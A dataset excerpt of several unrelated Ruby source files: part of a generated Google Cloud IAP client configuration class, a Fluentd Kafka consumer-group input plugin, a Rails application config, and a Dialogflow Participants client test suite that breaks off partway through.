the global config, setting the timeout for # # set_iam_policy to 20 seconds, # # and all remaining timeouts to 10 seconds. # ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.configure do |config| # config.timeout = 10.0 # config.rpcs.set_iam_policy.timeout = 20.0 # end # # # Apply the above configuration only to a new client. # client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new do |config| # config.timeout = 10.0 # config.rpcs.set_iam_policy.timeout = 20.0 # end # # @!attribute [rw] endpoint # The hostname or hostname:port of the service endpoint. # Defaults to `"iap.googleapis.com"`. # @return [::String] # @!attribute [rw] credentials # Credentials to send with calls. 
You may provide any of the following types: # * (`String`) The path to a service account key file in JSON format # * (`Hash`) A service account key as a Hash # * (`Google::Auth::Credentials`) A googleauth credentials object # (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html)) # * (`Signet::OAuth2::Client`) A signet oauth2 client object # (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html)) # * (`GRPC::Core::Channel`) a gRPC channel with included credentials # * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object # * (`nil`) indicating no credentials # @return [::Object] # @!attribute [rw] scope # The OAuth scopes # @return [::Array<::String>] # @!attribute [rw] lib_name # The library name as recorded in instrumentation and logging # @return [::String] # @!attribute [rw] lib_version # The library version as recorded in instrumentation and logging # @return [::String] # @!attribute [rw] channel_args # Extra parameters passed to the gRPC channel. Note: this is ignored if a # `GRPC::Core::Channel` object is provided as the credential. # @return [::Hash] # @!attribute [rw] interceptors # An array of interceptors that are run before calls are executed. # @return [::Array<::GRPC::ClientInterceptor>] # @!attribute [rw] timeout # The call timeout in seconds. # @return [::Numeric] # @!attribute [rw] metadata # Additional gRPC headers to be sent with the call. # @return [::Hash{::Symbol=>::String}] # @!attribute [rw] retry_policy # The retry policy. The value is a hash with the following keys: # * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds. # * `:max_delay` (*type:* `Numeric`) - The max delay in seconds. # * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier. # * `:retry_codes` (*type:* `Array<String>`) - The error codes that should # trigger a retry. # @return [::Hash] # @!attribute [rw] quota_project # A separate project against which to charge quota. # @return [::String] # class Configuration extend ::Gapic::Config config_attr :endpoint, "iap.googleapis.com", ::String config_attr :credentials, nil do |value| allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil] allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC allowed.any? { |klass| klass === value } end config_attr :scope, nil, ::String, ::Array, nil config_attr :lib_name, nil, ::String, nil config_attr :lib_version, nil, ::String, nil config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil) config_attr :interceptors, nil, ::Array, nil config_attr :timeout, nil, ::Numeric, nil config_attr :metadata, nil, ::Hash, nil config_attr :retry_policy, nil, ::Hash, ::Proc, nil config_attr :quota_project, nil, ::String, nil # @private def initialize parent_config = nil @parent_config = parent_config unless parent_config.nil? yield self if block_given? end ## # Configurations for individual RPCs # @return [Rpcs] # def rpcs @rpcs ||= begin parent_rpcs = nil parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs) Rpcs.new parent_rpcs end end ## # Configuration RPC class for the IdentityAwareProxyAdminService API. # # Includes fields providing the configuration for each RPC in this service. 
# Each configuration object is of type `Gapic::Config::Method` and includes # the following configuration fields: # # * `timeout` (*type:* `Numeric`) - The call timeout in seconds # * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers # * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields # include the following keys: # * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds. # * `:max_delay` (*type:* `Numeric`) - The max delay in seconds. # * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier. # * `:retry_codes` (*type:* `Array<String>`) - The error codes that should # trigger a retry. # class Rpcs ## # RPC-specific configuration for `set_iam_policy` # @return [::Gapic::Config::Method] # attr_reader :set_iam_policy ## # RPC-specific configuration for `get_iam_policy` # @return [::Gapic::Config::Method] # attr_reader :get_iam_policy ## # RPC-specific configuration for `test_iam_permissions` # @return [::Gapic::Config::Method] # attr_reader :test_iam_permissions ## # RPC-specific configuration for `get_iap_settings` # @return [::Gapic::Config::Method] # attr_reader :get_iap_settings ## # RPC-specific configuration for `update_iap_settings` # @return [::Gapic::Config::Method] # attr_reader :update_iap_settings # @private def initialize parent_rpcs = nil set_iam_policy_config = parent_rpcs.set_iam_policy if parent_rpcs.respond_to? :set_iam_policy @set_iam_policy = ::Gapic::Config::Method.new set_iam_policy_config get_iam_policy_config = parent_rpcs.get_iam_policy if parent_rpcs.respond_to? :get_iam_policy @get_iam_policy = ::Gapic::Config::Method.new get_iam_policy_config test_iam_permissions_config = parent_rpcs.test_iam_permissions if parent_rpcs.respond_to? :test_iam_permissions @test_iam_permissions = ::Gapic::Config::Method.new test_iam_permissions_config get_iap_settings_config = parent_rpcs.get_iap_settings if parent_rpcs.respond_to? :get_iap_settings @get_iap_settings = ::Gapic::Config::Method.new get_iap_settings_config update_iap_settings_config = parent_rpcs.update_iap_settings if parent_rpcs.respond_to? :update_iap_settings @update_iap_settings = ::Gapic::Config::Method.new update_iap_settings_config yield self if block_given? end end end end end end end end end
51.797203
137
0.56992
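The generated client above documents its own construction and per-call patterns; a short call sketch tying them together — the require path assumes the google-cloud-iap-v1 gem is installed, and the resource name is a placeholder whose exact format is defined by the IAP API, not by this file:

# Hypothetical usage of the generated IdentityAwareProxyAdminService client.
require "google/cloud/iap/v1"

client = ::Google::Cloud::Iap::V1::IdentityAwareProxyAdminService::Client.new do |config|
  config.timeout = 10.0 # mirrors the configuration example in the client docs above
end

# get_iap_settings accepts the request as keyword arguments, a Hash, or a
# GetIapSettingsRequest object, as described in the method documentation above.
settings = client.get_iap_settings name: "projects/PROJECT_NUMBER/iap_web"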
f7f351a95c6a3871abd68cfcebba9839bf9cec8c
14,885
require 'fluent/input' require 'fluent/time' require 'fluent/plugin/kafka_plugin_util' class Fluent::KafkaGroupInput < Fluent::Input Fluent::Plugin.register_input('kafka_group', self) config_param :brokers, :string, :default => 'localhost:9092', :desc => "List of broker-host:port, separate with comma, must set." config_param :consumer_group, :string, :desc => "Consumer group name, must set." config_param :topics, :string, :desc => "Listening topics(separate with comma',')." config_param :client_id, :string, :default => 'kafka' config_param :sasl_over_ssl, :bool, :default => true, :desc => "Set to false to prevent SSL strict mode when using SASL authentication" config_param :format, :string, :default => 'json', :desc => "Supported format: (json|text|ltsv|msgpack)" config_param :message_key, :string, :default => 'message', :desc => "For 'text' format only." config_param :add_headers, :bool, :default => false, :desc => "Add kafka's message headers to event record" config_param :add_prefix, :string, :default => nil, :desc => "Tag prefix (Optional)" config_param :add_suffix, :string, :default => nil, :desc => "Tag suffix (Optional)" config_param :retry_emit_limit, :integer, :default => nil, :desc => "How long to stop event consuming when BufferQueueLimitError happens. Wait retry_emit_limit x 1s. The default is waiting until BufferQueueLimitError is resolved" config_param :use_record_time, :bool, :default => false, :desc => "Replace message timestamp with contents of 'time' field.", :deprecated => "Use 'time_source record' instead." config_param :time_source, :enum, :list => [:now, :kafka, :record], :default => :now, :desc => "Source for message timestamp." config_param :record_time_key, :string, :default => 'time', :desc => "Time field when time_source is 'record'" config_param :get_kafka_client_log, :bool, :default => false config_param :time_format, :string, :default => nil, :desc => "Time format to be used to parse 'time' field." config_param :tag_source, :enum, :list => [:topic, :record], :default => :topic, :desc => "Source for the fluentd event tag" config_param :record_tag_key, :string, :default => 'tag', :desc => "Tag field when tag_source is 'record'" config_param :kafka_message_key, :string, :default => nil, :desc => "Set kafka's message key to this field" config_param :connect_timeout, :integer, :default => nil, :desc => "[Integer, nil] the timeout setting for connecting to brokers" config_param :socket_timeout, :integer, :default => nil, :desc => "[Integer, nil] the timeout setting for socket connection" config_param :retry_wait_seconds, :integer, :default => 30 config_param :disable_retry_limit, :bool, :default => false, :desc => "If set true, it disables retry_limit and make Fluentd retry indefinitely (default: false)" config_param :retry_limit, :integer, :default => 10, :desc => "The maximum number of retries for connecting kafka (default: 10)" # Kafka consumer options config_param :max_bytes, :integer, :default => 1048576, :desc => "Maximum number of bytes to fetch." config_param :max_wait_time, :integer, :default => nil, :desc => "How long to block until the server sends us data." config_param :min_bytes, :integer, :default => nil, :desc => "Smallest amount of data the server should send us." 
config_param :session_timeout, :integer, :default => nil, :desc => "The number of seconds after which, if a client hasn't contacted the Kafka cluster" config_param :offset_commit_interval, :integer, :default => nil, :desc => "The interval between offset commits, in seconds" config_param :offset_commit_threshold, :integer, :default => nil, :desc => "The number of messages that can be processed before their offsets are committed" config_param :fetcher_max_queue_size, :integer, :default => nil, :desc => "The number of fetched messages per partition that are queued in fetcher queue" config_param :start_from_beginning, :bool, :default => true, :desc => "Whether to start from the beginning of the topic or just subscribe to new messages being produced" include Fluent::KafkaPluginUtil::SSLSettings include Fluent::KafkaPluginUtil::SaslSettings class ForShutdown < StandardError end BufferError = if defined?(Fluent::Plugin::Buffer::BufferOverflowError) Fluent::Plugin::Buffer::BufferOverflowError else Fluent::BufferQueueLimitError end unless method_defined?(:router) define_method("router") { Fluent::Engine } end def initialize super require 'kafka' @time_parser = nil @retry_count = 1 end def _config_to_array(config) config_array = config.split(',').map {|k| k.strip } if config_array.empty? raise Fluent::ConfigError, "kafka_group: '#{config}' is a required parameter" end config_array end def multi_workers_ready? true end private :_config_to_array def configure(conf) super $log.info "Will watch for topics #{@topics} at brokers " \ "#{@brokers} and '#{@consumer_group}' group" @topics = _config_to_array(@topics) if conf['max_wait_ms'] log.warn "'max_wait_ms' parameter is deprecated. Use second unit 'max_wait_time' instead" @max_wait_time = conf['max_wait_ms'].to_i / 1000 end @parser_proc = setup_parser(conf) @consumer_opts = {:group_id => @consumer_group} @consumer_opts[:session_timeout] = @session_timeout if @session_timeout @consumer_opts[:offset_commit_interval] = @offset_commit_interval if @offset_commit_interval @consumer_opts[:offset_commit_threshold] = @offset_commit_threshold if @offset_commit_threshold @consumer_opts[:fetcher_max_queue_size] = @fetcher_max_queue_size if @fetcher_max_queue_size @fetch_opts = {} @fetch_opts[:max_wait_time] = @max_wait_time if @max_wait_time @fetch_opts[:min_bytes] = @min_bytes if @min_bytes @time_source = :record if @use_record_time if @time_source == :record and @time_format if defined?(Fluent::TimeParser) @time_parser = Fluent::TimeParser.new(@time_format) else @time_parser = Fluent::TextParser::TimeParser.new(@time_format) end end if @time_source == :record && defined?(Fluent::NumericTimeParser) @float_numeric_parse = Fluent::NumericTimeParser.new(:float) end end def setup_parser(conf) case @format when 'json' begin require 'oj' Oj.default_options = Fluent::DEFAULT_OJ_OPTIONS Proc.new { |msg| Oj.load(msg.value) } rescue LoadError require 'yajl' Proc.new { |msg| Yajl::Parser.parse(msg.value) } end when 'ltsv' require 'ltsv' Proc.new { |msg| LTSV.parse(msg.value, {:symbolize_keys => false}).first } when 'msgpack' require 'msgpack' Proc.new { |msg| MessagePack.unpack(msg.value) } when 'text' Proc.new { |msg| {@message_key => msg.value} } else @custom_parser = Fluent::Plugin.new_parser(conf['format']) @custom_parser.configure(conf) Proc.new { |msg| @custom_parser.parse(msg.value) {|_time, record| record } } end end def start super logger = @get_kafka_client_log ? 
log : nil if @scram_mechanism != nil && @username != nil && @password != nil @kafka = Kafka.new(seed_brokers: @brokers, client_id: @client_id, logger: logger, connect_timeout: @connect_timeout, socket_timeout: @socket_timeout, ssl_ca_cert: read_ssl_file(@ssl_ca_cert), ssl_client_cert: read_ssl_file(@ssl_client_cert), ssl_client_cert_key: read_ssl_file(@ssl_client_cert_key), ssl_ca_certs_from_system: @ssl_ca_certs_from_system, sasl_scram_username: @username, sasl_scram_password: @password, sasl_scram_mechanism: @scram_mechanism, sasl_over_ssl: @sasl_over_ssl, ssl_verify_hostname: @ssl_verify_hostname) elsif @username != nil && @password != nil @kafka = Kafka.new(seed_brokers: @brokers, client_id: @client_id, logger: logger, connect_timeout: @connect_timeout, socket_timeout: @socket_timeout, ssl_ca_cert: read_ssl_file(@ssl_ca_cert), ssl_client_cert: read_ssl_file(@ssl_client_cert), ssl_client_cert_key: read_ssl_file(@ssl_client_cert_key), ssl_ca_certs_from_system: @ssl_ca_certs_from_system, sasl_plain_username: @username, sasl_plain_password: @password, sasl_over_ssl: @sasl_over_ssl, ssl_verify_hostname: @ssl_verify_hostname) else @kafka = Kafka.new(seed_brokers: @brokers, client_id: @client_id, logger: logger, connect_timeout: @connect_timeout, socket_timeout: @socket_timeout, ssl_ca_cert: read_ssl_file(@ssl_ca_cert), ssl_client_cert: read_ssl_file(@ssl_client_cert), ssl_client_cert_key: read_ssl_file(@ssl_client_cert_key), ssl_ca_certs_from_system: @ssl_ca_certs_from_system, sasl_gssapi_principal: @principal, sasl_gssapi_keytab: @keytab, ssl_verify_hostname: @ssl_verify_hostname) end @consumer = setup_consumer @thread = Thread.new(&method(:run)) end def shutdown # This nil assignment should be guarded by mutex in multithread programming manner. # But the situation is very low contention, so we don't use mutex for now. # If the problem happens, we will add a guard for consumer. consumer = @consumer @consumer = nil consumer.stop @thread.join @kafka.close super end def setup_consumer consumer = @kafka.consumer(@consumer_opts) @topics.each { |topic| if m = /^\/(.+)\/$/.match(topic) topic_or_regex = Regexp.new(m[1]) $log.info "Subscribe to topics matching the regex #{topic}" else topic_or_regex = topic $log.info "Subscribe to topic #{topic}" end consumer.subscribe(topic_or_regex, start_from_beginning: @start_from_beginning, max_bytes_per_partition: @max_bytes) } consumer end def reconnect_consumer log.warn "Stopping Consumer" consumer = @consumer @consumer = nil if consumer consumer.stop end log.warn "Could not connect to broker. retry_time:#{@retry_count}. Next retry will be in #{@retry_wait_seconds} seconds" @retry_count = @retry_count + 1 sleep @retry_wait_seconds @consumer = setup_consumer log.warn "Re-starting consumer #{Time.now.to_s}" @retry_count = 0 rescue =>e log.error "unexpected error during re-starting consumer object access", :error => e.to_s log.error_backtrace if @retry_count <= @retry_limit or disable_retry_limit reconnect_consumer end end def process_batch_with_record_tag(batch) es = {} batch.messages.each { |msg| begin record = @parser_proc.call(msg) tag = record[@record_tag_key] tag = @add_prefix + "." + tag if @add_prefix tag = tag + "." 
+ @add_suffix if @add_suffix es[tag] ||= Fluent::MultiEventStream.new case @time_source when :kafka record_time = Fluent::EventTime.from_time(msg.create_time) when :now record_time = Fluent::Engine.now when :record if @time_format record_time = @time_parser.parse(record[@record_time_key].to_s) else record_time = record[@record_time_key] end else log.fatal "BUG: invalid time_source: #{@time_source}" end if @kafka_message_key record[@kafka_message_key] = msg.key end if @add_headers msg.headers.each_pair { |k, v| record[k] = v } end es[tag].add(record_time, record) rescue => e log.warn "parser error in #{batch.topic}/#{batch.partition}", :error => e.to_s, :value => msg.value, :offset => msg.offset log.debug_backtrace end } unless es.empty? es.each { |tag,es| emit_events(tag, es) } end end def process_batch(batch) es = Fluent::MultiEventStream.new tag = batch.topic tag = @add_prefix + "." + tag if @add_prefix tag = tag + "." + @add_suffix if @add_suffix batch.messages.each { |msg| begin record = @parser_proc.call(msg) case @time_source when :kafka record_time = Fluent::EventTime.from_time(msg.create_time) when :now record_time = Fluent::Engine.now when :record record_time = record[@record_time_key] if @time_format record_time = @time_parser.parse(record_time.to_s) elsif record_time.is_a?(Float) && @float_numeric_parse record_time = @float_numeric_parse.parse(record_time) end else log.fatal "BUG: invalid time_source: #{@time_source}" end if @kafka_message_key record[@kafka_message_key] = msg.key end if @add_headers msg.headers.each_pair { |k, v| record[k] = v } end es.add(record_time, record) rescue => e log.warn "parser error in #{batch.topic}/#{batch.partition}", :error => e.to_s, :value => msg.value, :offset => msg.offset log.debug_backtrace end } unless es.empty? emit_events(tag, es) end end def run while @consumer begin @consumer.each_batch(@fetch_opts) { |batch| if @tag_source == :record process_batch_with_record_tag(batch) else process_batch(batch) end } rescue ForShutdown rescue => e log.error "unexpected error during consuming events from kafka. Re-fetch events.", :error => e.to_s log.error_backtrace reconnect_consumer end end rescue => e log.error "unexpected error during consumer object access", :error => e.to_s log.error_backtrace end def emit_events(tag, es) retries = 0 begin router.emit_stream(tag, es) rescue BufferError raise ForShutdown if @consumer.nil? if @retry_emit_limit.nil? sleep 1 retry end if retries < @retry_emit_limit retries += 1 sleep 1 retry else raise RuntimeError, "Exceeds retry_emit_limit" end end end end
38.264781
197
0.645348
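One detail of the kafka_group input plugin above worth illustrating: the topics parameter is a comma-separated list, and entries wrapped in slashes are subscribed as regular expressions (see _config_to_array and setup_consumer). A standalone sketch of that parsing, with made-up topic names:

# Mirrors the plugin's topic handling; the topic names are illustrative only.
topics = 'app.logs, /^metrics\..+/'.split(',').map(&:strip)
topics.each do |topic|
  if (m = %r{^/(.+)/$}.match(topic))
    puts "subscribe to topics matching #{Regexp.new(m[1]).inspect}"
  else
    puts "subscribe to topic #{topic}"
  end
end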
bf43be3f328dbbf76c126ae8303d27582d25af31
1,119
require File.expand_path('../boot', __FILE__) require 'rails/all' # Require the gems listed in Gemfile, including any gems # you've limited to :test, :development, or :production. Bundler.require(*Rails.groups) module Topicsources class Application < Rails::Application # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. # Set Time.zone default to the specified zone and make Active Record auto-convert to this zone. # Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC. # config.time_zone = 'Central Time (US & Canada)' # The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded. # config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s] # config.i18n.default_locale = :de # Do not swallow errors in after_commit/after_rollback callbacks. config.active_record.raise_in_transactional_callbacks = true end end
41.444444
99
0.734584
ab367dc14bdd9affac7a0fc77b9ba077e566ac23
30,647
# frozen_string_literal: true # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Auto-generated by gapic-generator-ruby. DO NOT EDIT! require "helper" require "gapic/grpc/service_stub" require "google/cloud/dialogflow/v2beta1/participant_pb" require "google/cloud/dialogflow/v2beta1/participant_services_pb" require "google/cloud/dialogflow/v2beta1/participants" class ::Google::Cloud::Dialogflow::V2beta1::Participants::ClientTest < Minitest::Test class ClientStub attr_accessor :call_rpc_count, :requests def initialize response, operation, &block @response = response @operation = operation @block = block @call_rpc_count = 0 @requests = [] end def call_rpc *args, **kwargs @call_rpc_count += 1 @requests << @block&.call(*args, **kwargs) yield @response, @operation if block_given? @response end end def test_create_participant # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::Participant.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. parent = "hello world" participant = {} create_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :create_participant, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::CreateParticipantRequest, request assert_equal "hello world", request["parent"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::Participant), request["participant"] refute_nil options end Gapic::ServiceStub.stub :new, create_participant_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.create_participant({ parent: parent, participant: participant }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.create_participant parent: parent, participant: participant do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.create_participant ::Google::Cloud::Dialogflow::V2beta1::CreateParticipantRequest.new(parent: parent, participant: participant) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.create_participant({ parent: parent, participant: participant }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.create_participant(::Google::Cloud::Dialogflow::V2beta1::CreateParticipantRequest.new(parent: parent, participant: participant), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, 
create_participant_client_stub.call_rpc_count end end def test_get_participant # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::Participant.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. name = "hello world" get_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :get_participant, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::GetParticipantRequest, request assert_equal "hello world", request["name"] refute_nil options end Gapic::ServiceStub.stub :new, get_participant_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.get_participant({ name: name }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.get_participant name: name do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.get_participant ::Google::Cloud::Dialogflow::V2beta1::GetParticipantRequest.new(name: name) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.get_participant({ name: name }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.get_participant(::Google::Cloud::Dialogflow::V2beta1::GetParticipantRequest.new(name: name), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, get_participant_client_stub.call_rpc_count end end def test_list_participants # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::ListParticipantsResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
parent = "hello world" page_size = 42 page_token = "hello world" list_participants_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :list_participants, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::ListParticipantsRequest, request assert_equal "hello world", request["parent"] assert_equal 42, request["page_size"] assert_equal "hello world", request["page_token"] refute_nil options end Gapic::ServiceStub.stub :new, list_participants_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use named arguments client.list_participants parent: parent, page_size: page_size, page_token: page_token do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object client.list_participants ::Google::Cloud::Dialogflow::V2beta1::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use hash object with options client.list_participants({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Use protobuf object with options client.list_participants(::Google::Cloud::Dialogflow::V2beta1::ListParticipantsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation| assert_kind_of Gapic::PagedEnumerable, response assert_equal grpc_response, response.response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, list_participants_client_stub.call_rpc_count end end def test_update_participant # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::Participant.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
participant = {} update_mask = {} update_participant_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :update_participant, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::UpdateParticipantRequest, request assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::Participant), request["participant"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::FieldMask), request["update_mask"] refute_nil options end Gapic::ServiceStub.stub :new, update_participant_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.update_participant({ participant: participant, update_mask: update_mask }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.update_participant participant: participant, update_mask: update_mask do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.update_participant ::Google::Cloud::Dialogflow::V2beta1::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.update_participant({ participant: participant, update_mask: update_mask }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.update_participant(::Google::Cloud::Dialogflow::V2beta1::UpdateParticipantRequest.new(participant: participant, update_mask: update_mask), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, update_participant_client_stub.call_rpc_count end end def test_analyze_content # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
participant = "hello world" text_input = {} reply_audio_config = {} query_params = {} message_send_time = {} request_id = "hello world" analyze_content_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :analyze_content, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentRequest, request assert_equal "hello world", request["participant"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::TextInput), request["text_input"] assert_equal :text_input, request.input assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::OutputAudioConfig), request["reply_audio_config"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Dialogflow::V2beta1::QueryParameters), request["query_params"] assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Protobuf::Timestamp), request["message_send_time"] assert_equal "hello world", request["request_id"] refute_nil options end Gapic::ServiceStub.stub :new, analyze_content_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.analyze_content participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.analyze_content ::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.analyze_content({ participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with options client.analyze_content(::Google::Cloud::Dialogflow::V2beta1::AnalyzeContentRequest.new(participant: participant, text_input: text_input, reply_audio_config: reply_audio_config, query_params: query_params, message_send_time: message_send_time, request_id: request_id), grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Verify method calls assert_equal 5, analyze_content_client_stub.call_rpc_count end end def test_suggest_articles # Create GRPC objects. grpc_response = ::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesResponse.new grpc_operation = GRPC::ActiveCall::Operation.new nil grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure grpc_options = {} # Create request parameters for a unary method. 
parent = "hello world" latest_message = "hello world" context_size = 42 suggest_articles_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:| assert_equal :suggest_articles, name assert_kind_of ::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesRequest, request assert_equal "hello world", request["parent"] assert_equal "hello world", request["latest_message"] assert_equal 42, request["context_size"] refute_nil options end Gapic::ServiceStub.stub :new, suggest_articles_client_stub do # Create client client = ::Google::Cloud::Dialogflow::V2beta1::Participants::Client.new do |config| config.credentials = grpc_channel end # Use hash object client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use named arguments client.suggest_articles parent: parent, latest_message: latest_message, context_size: context_size do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object client.suggest_articles ::Google::Cloud::Dialogflow::V2beta1::SuggestArticlesRequest.new(parent: parent, latest_message: latest_message, context_size: context_size) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use hash object with options client.suggest_articles({ parent: parent, latest_message: latest_message, context_size: context_size }, grpc_options) do |response, operation| assert_equal grpc_response, response assert_equal grpc_operation, operation end # Use protobuf object with 